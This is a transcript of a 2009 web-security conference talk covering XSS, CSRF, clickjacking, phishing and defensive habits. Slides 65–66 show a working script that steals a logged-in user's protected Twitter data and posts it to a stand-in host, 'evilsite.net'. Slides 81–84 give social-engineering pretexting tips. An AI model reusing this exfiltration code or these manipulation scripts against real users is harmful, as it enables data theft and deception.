Things that go bump on the web - Web Application Security
-
Upload
christian-heilmann -
Category
Education
-
view
17.110 -
download
0
description
Transcript of Things that go bump on the web - Web Application Security
![Page 1: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/1.jpg)
Things that go bump on the web
Christian Heilmann | http://wait-till-i.com | http://scriptingenabled.org
Web Directions North, Denver, Colorado, February 2009
![Page 2: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/2.jpg)
Disclaimer:The following is a personal presentation and the views do not necessarily reflect those of my employer or the conference organizer!
There will be strong language, public exposure (of security issues) and some strong opinions.
Viewer discretion is advised.
![Page 3: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/3.jpg)
Hello, I am Chris.
![Page 4: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/4.jpg)
I’m here today to talk to you about web application
security.
![Page 5: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/5.jpg)
I’ve seen several security presentations myself.
![Page 6: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/6.jpg)
And they fall into a few categories:
![Page 7: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/7.jpg)
Technical mumbo jumbo that leaves you feeling
inadequate and scared.
![Page 8: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/8.jpg)
“Neener Neener, look what I can hack” show-offs.
![Page 9: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/9.jpg)
“Use our systems or you’ll be dead tomorrow.” sales
pitches.
![Page 10: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/10.jpg)
I wanted to avoid anything like that.
![Page 11: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/11.jpg)
My intention is not to leave you feeling patronised...
![Page 12: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/12.jpg)
...confused or scared.
![Page 13: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/13.jpg)
I want to point out several basics of web security...
![Page 14: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/14.jpg)
...and offer some ideas of how you can prevent the worst and help us make the web
safer.
![Page 15: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/15.jpg)
Here’s what I will go through:
Close the gates.
Clean up your mess.
Don’t breed idiots.
Stay up-to-date.
Constant Vigilance, Harry!
censored
![Page 16: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/16.jpg)
Close the Gates!
![Page 17: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/17.jpg)
Here’s a quick roundup of attack technologies and
methodologies you should know about.
![Page 18: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/18.jpg)
XSS!
![Page 19: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/19.jpg)
https://www.owasp.org/index.php?title=XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
![Page 20: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/20.jpg)
XSS means that people can successfully inject something into your sites that shouldn’t
be there.
![Page 21: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/21.jpg)
Successfully injecting JavaScript in your site allows
me to steal and fake the identity of your users or
yourself.
![Page 22: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/22.jpg)
SQL Injection
![Page 23: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/23.jpg)
![Page 24: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/24.jpg)
Always filter SQL statements from your requests!
![Page 25: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/25.jpg)
CSRF!
![Page 26: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/26.jpg)
http://en.wikipedia.org/wiki/Cross-site_request_forgery
![Page 27: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/27.jpg)
CSRF happens when you have predictable urls to initiate
actions – like deleting a form post or transferring money.
![Page 28: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/28.jpg)
This url could then be called in the background from
another site – via an image or a form submission in
JavaScript.
![Page 29: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/29.jpg)
Clickjacking
![Page 30: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/30.jpg)
http://ha.ckers.org/blog/20080915/clickjacking/
![Page 31: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/31.jpg)
Clickjacking is a trick to cover a real interface in an IFRAME
with a transparent GIF or Flash movie...
![Page 32: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/32.jpg)
...to send you to another site or pretend there was a
problem and asking for you to log in again.
![Page 33: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/33.jpg)
Isn’t it interesting that the verified by visa security tool
makes that look very normal?
![Page 34: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/34.jpg)
Phishing!
![Page 35: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/35.jpg)
Phishing means showing a familiar interface and luring
users into entering data.
![Page 36: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/36.jpg)
The only way to prevent this is let the user choose a secret
only they know...
![Page 37: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/37.jpg)
...like the Yahoo sign-in seal.
![Page 38: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/38.jpg)
I approve of this!
![Page 39: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/39.jpg)
XBCR!
![Page 40: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/40.jpg)
http://en.wikipedia.org/wiki/Cross-boundary-currency-request
FAKE!
![Page 41: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/41.jpg)
Clean up your mess!
![Page 42: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/42.jpg)
A lot of security problems happen because people leave
data behind.
![Page 43: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/43.jpg)
This can be in their HTML.
![Page 44: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/44.jpg)
Comments are not a good tool to turn off sections of the
page that shouldn’t be available yet!
![Page 45: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/45.jpg)
Or it can be in JavaScript...
![Page 46: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/46.jpg)
![Page 47: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/47.jpg)
Or on their server:
![Page 48: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/48.jpg)
![Page 49: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/49.jpg)
Or in their browsers.
![Page 50: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/50.jpg)
I built TweetEffect.com, a small tool to check your
twitter follower changes.
![Page 51: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/51.jpg)
![Page 52: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/52.jpg)
And then I got this email (not real size, it had to be resized)
![Page 53: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/53.jpg)
![Page 54: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/54.jpg)
I checked the user name and saw nothing – just a “this user
isn’t available”.
![Page 55: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/55.jpg)
What happened?
![Page 56: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/56.jpg)
Apparently this person was logged in and of course that
way authenticated to see the updates.
![Page 57: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/57.jpg)
The same thing happens when one of the friends of that person is logged in!
![Page 58: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/58.jpg)
So, this is interesting...
![Page 59: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/59.jpg)
![Page 60: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/60.jpg)
Step 1: Log in yourself
![Page 61: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/61.jpg)
Step 2: Get his list of followers
![Page 62: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/62.jpg)
![Page 63: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/63.jpg)
Step 3: Set the trap
![Page 64: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/64.jpg)
You can get a user’s updates with a simple REST call:
http://twitter.com/statuses/user_timeline/codepo8.xml?
count=200
![Page 65: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/65.jpg)
<img src=”tuna_funny.jpg” alt=”tee hee hee”><form method=”post” action=”http://evilsite.net/leech.php”><input type=”hidden” value=”” name=”muahaha”></form>
![Page 66: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/66.jpg)
<script>function evilgenius(o){ var m=document.getElementById(‘muahaha’); m.value=o; document.forms[0].submit();}</script><script src=”http://twitter.com/statuses/user_timeline/tuna.json?count=200&callback=evilgenius”></script>
![Page 67: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/67.jpg)
...alternatively use Ajax...
![Page 68: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/68.jpg)
Step 4: Contact random friend of tuna to visit the site.
![Page 69: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/69.jpg)
As they are authenticated the data will be returned without
a question and sent to your server.
![Page 70: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/70.jpg)
Learnings: Do not trust browsers, ever!
A lock on a screen does not mean protection!
You are as protected as the people you deal with.
![Page 71: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/71.jpg)
Which brings me to the next point...
![Page 72: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/72.jpg)
I am now going to be a bit daring.
I will ask you to question common ways of thinking and considering alternatives.
DANGER!
![Page 73: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/73.jpg)
Don’t breed idiots!
![Page 74: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/74.jpg)
I’m a designer, why should I care about web application security?
![Page 75: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/75.jpg)
Designers help users do the right things in the easiest and
most effective manner.
![Page 76: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/76.jpg)
We have the chance to increase usability to stop
people repeatedly shooting themselves in the foot.
![Page 77: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/77.jpg)
None of this!
![Page 78: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/78.jpg)
Users should be conditioned not to trust blindly.
![Page 79: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/79.jpg)
Yet we tell them to store their information on computers and give them an option to
stay logged in.
![Page 80: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/80.jpg)
Getting information out of people is easy:
![Page 81: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/81.jpg)
Be confident, show (or fake) authority, keep things
confusing and give them a wrong sense of urgency.
![Page 82: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/82.jpg)
“Look, your wireless is flaky, I am in the middle of a phone conference and it keeps dropping out. Is there a wired connection in this lounge?”
![Page 83: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/83.jpg)
“Do you have a first class ticket?”
“I just asked you where the wired connection is, this is an urgent
conference and I need to answer this now!”
![Page 84: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/84.jpg)
= Chris had some hours in the first class lounge!
![Page 85: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/85.jpg)
Why did that work?
![Page 86: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/86.jpg)
People are used to being treated like this.
![Page 87: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/87.jpg)
![Page 88: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/88.jpg)
We also don’t tell users off for using clever passwords like “password” or “happiness”.
![Page 89: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/89.jpg)
![Page 90: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/90.jpg)
Don’t make your end users suffer for your lack of
security.
![Page 91: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/91.jpg)
CAPTCHAS solve nothing!
http://caca.zoy.org/wiki/PWNtcha
![Page 92: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/92.jpg)
Here’s a challenge for you design and marketing
wizards:
![Page 93: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/93.jpg)
How about an interface that makes it fun to change your
password every week?
![Page 94: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/94.jpg)
And here’s a challenge for security experts:
![Page 95: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/95.jpg)
Use HUMAN language!
![Page 96: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/96.jpg)
“confused deputy”
![Page 97: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/97.jpg)
“man in the middle attack”
![Page 98: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/98.jpg)
“the password antipattern”
![Page 99: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/99.jpg)
How about
“giving your login and password for one system to another system is like writing your pin number on your credit card and asking a stranger to buy something for you!”
![Page 100: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/100.jpg)
Stay up to date!
![Page 101: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/101.jpg)
There is no security in sticking with outdated systems.
![Page 102: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/102.jpg)
Therefore make sure to keep your server, your client
software and your operating system up-to-date.
![Page 103: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/103.jpg)
![Page 104: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/104.jpg)
Even if companies offer a way out not to “break the web”.
![Page 105: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/105.jpg)
None of this!
![Page 106: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/106.jpg)
This also applies to your skills.
![Page 107: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/107.jpg)
If you *don’t* want to be the guardian against evil and
have *your butt on the line* when things to bump...
![Page 108: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/108.jpg)
...build with frameworks!
![Page 109: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/109.jpg)
Symfony, Django, Rails all offer out-of-the-box filtering
and sanitization.
![Page 110: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/110.jpg)
If there is a vulnerability, it can be fixed by a lot of people and pushed out as an update.
![Page 111: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/111.jpg)
Constant vigilance!Screenshot from Harry Potter and the Goblet of fire, found on some blog but probably courtesy of Warner Brothers
![Page 112: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/112.jpg)
The most important thing for you is to constantly be aware of what your servers are up
to.
![Page 113: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/113.jpg)
This *does* include your blog and portfolio!
![Page 114: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/114.jpg)
Any server can be a spam hub or part of an attack network.
![Page 115: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/115.jpg)
Your friends are:
Server logs
Statistics software
![Page 116: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/116.jpg)
![Page 117: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/117.jpg)
Don’t just look at the numbers
![Page 118: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/118.jpg)
More interesting are
“posted forms”
![Page 119: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/119.jpg)
And “page query terms”
![Page 120: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/120.jpg)
Keep up-to-date with what’s happening in web security.
![Page 121: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/121.jpg)
http://simonwillison.net/tags/security/
![Page 122: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/122.jpg)
Stay curious to poke at things and find out their flaws and
report them!
![Page 123: Things that go bump on the web - Web Application Security](https://reader033.fdocuments.net/reader033/viewer/2022051323/5484c943b47959190d8b4c9c/html5/thumbnails/123.jpg)
Christian Heilmann
http://wait-till-i.com
http://scriptingenabled.org
http://twitter.com/codepo8
T H A N K S !
Images by icanhazcheeseburger.com, failblog.org,kqe.de and from the web.Eye photo: http://flickr.com/photos/jaredmoo/2113943480